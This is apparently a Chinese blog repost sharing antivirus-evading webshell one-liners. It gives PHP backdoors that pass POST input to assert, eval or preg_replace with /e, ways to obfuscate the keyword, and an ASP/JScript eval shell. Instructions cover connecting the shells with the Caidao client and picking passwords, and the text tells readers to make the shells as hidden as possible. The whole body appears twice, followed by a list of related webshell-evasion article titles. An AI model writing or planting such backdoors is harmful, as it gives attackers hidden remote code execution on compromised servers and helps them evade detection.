php一句话免杀
2011-09-13 00:38
197 查看
by Tm3yShell7
<?php $_GET['ts7']($_POST['cmd']);?>
客户端用菜刀,密码cmd,url为test.php?ts7=assert
这个应该算没有什么特征码了,但是缺点就是在web日志中会暴露出来assert
可以都用post:
<?php $_POST['ts7']($_POST['cmd']);?>
在菜刀说明用<O>ts7=assert</O>post附加数据.
这中间考虑了这些:
<?php
$ts7 = (string)key($_POST);
$ts7($_POST[’assert']);
?>
猛然发现assert这个关键词又出现了。。
既然字符串可以直接这样用,那还可以这样:
<?php
$a = “a”.”s”.”s”.”e”.”r”.”t”;
$a($_POST["cmd"]);
?>
或者用$a = str_replace(x,”",”axsxxsxexrxxt”)
以上说来,感觉<?php $_POST['ts7']($_POST['cmd']);?>算是最难查到的一种了。
==========================
ywisax 在论坛上又发了这个:
不知是谁写的 百度了一堆 都没写出处,貌似是lcx写的:
asp版的,这是utf-8编码,自己看着弄吧
<%@LANGUAGE=”JAVASCRIPT” CODEPAGE=”65001″%>
<%
var lcx = {‘名字’ : Request.form(‘#’), ‘性别’ : eval, ‘年龄’ : ‘18′, ‘昵称’ : ‘请叫我一声老大’};
lcx.性别((lcx.名字)+”);
%>
用冰狐就行了
<?php
@preg_replace(“/[email]/e”,$_POST['h'],”error”);
?>
菜刀附加数据:
<O>h=@eval($_POST[c]);</O>
[email]和error你看着换吧,怎么隐蔽怎么来
密码c
<?php $_GET['ts7']($_POST['cmd']);?>
客户端用菜刀,密码cmd,url为test.php?ts7=assert
这个应该算没有什么特征码了,但是缺点就是在web日志中会暴露出来assert
可以都用post:
<?php $_POST['ts7']($_POST['cmd']);?>
在菜刀说明用<O>ts7=assert</O>post附加数据.
这中间考虑了这些:
<?php
$ts7 = (string)key($_POST);
$ts7($_POST[’assert']);
?>
猛然发现assert这个关键词又出现了。。
既然字符串可以直接这样用,那还可以这样:
<?php
$a = “a”.”s”.”s”.”e”.”r”.”t”;
$a($_POST["cmd"]);
?>
或者用$a = str_replace(x,”",”axsxxsxexrxxt”)
以上说来,感觉<?php $_POST['ts7']($_POST['cmd']);?>算是最难查到的一种了。
==========================
ywisax 在论坛上又发了这个:
不知是谁写的 百度了一堆 都没写出处,貌似是lcx写的:
asp版的,这是utf-8编码,自己看着弄吧
<%@LANGUAGE=”JAVASCRIPT” CODEPAGE=”65001″%>
<%
var lcx = {‘名字’ : Request.form(‘#’), ‘性别’ : eval, ‘年龄’ : ‘18′, ‘昵称’ : ‘请叫我一声老大’};
lcx.性别((lcx.名字)+”);
%>
用冰狐就行了
<?php
@preg_replace(“/[email]/e”,$_POST['h'],”error”);
?>
菜刀附加数据:
<O>h=@eval($_POST[c]);</O>
[email]和error你看着换吧,怎么隐蔽怎么来
密码c
相关文章推荐
- 绕过网站安全狗拦截,上传Webshell技巧总结(附免杀PHP一句话)
- 整理的最新WebSHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话)
- 关于php一句话免杀的分析
- 2016年11月整理的最新php免杀一句话木马, 2017php免杀一句话(php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话,php过waf一句话)
- PHP一句话过狗、卫士、D盾等免杀思路!
- 整理的最新WebSHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话)
- Zend加密 免杀PHP一句话藐视所有IIS防御软件
- 自用php一句话木马绝对免杀没有任何关键字
- 关于php一句话免杀的分析<转载>
- 那些强悍的PHP一句话后门
- 那些强悍的PHP一句话后门
- 那些强悍的PHP一句话后门
- 用php实现批量查询清除一句话后门的代码
- php回调后门,php过WAF一句话,php最新一句话,php过狗一句话.
- php创建一句话后门的sql语句
- [Yii一句话博客]隐藏Index.php
- 那些强悍的PHP一句话后门
- php shell超强免杀、减少体积工具实现代码
- PHP安全: 一个新型的php一句话cmdshell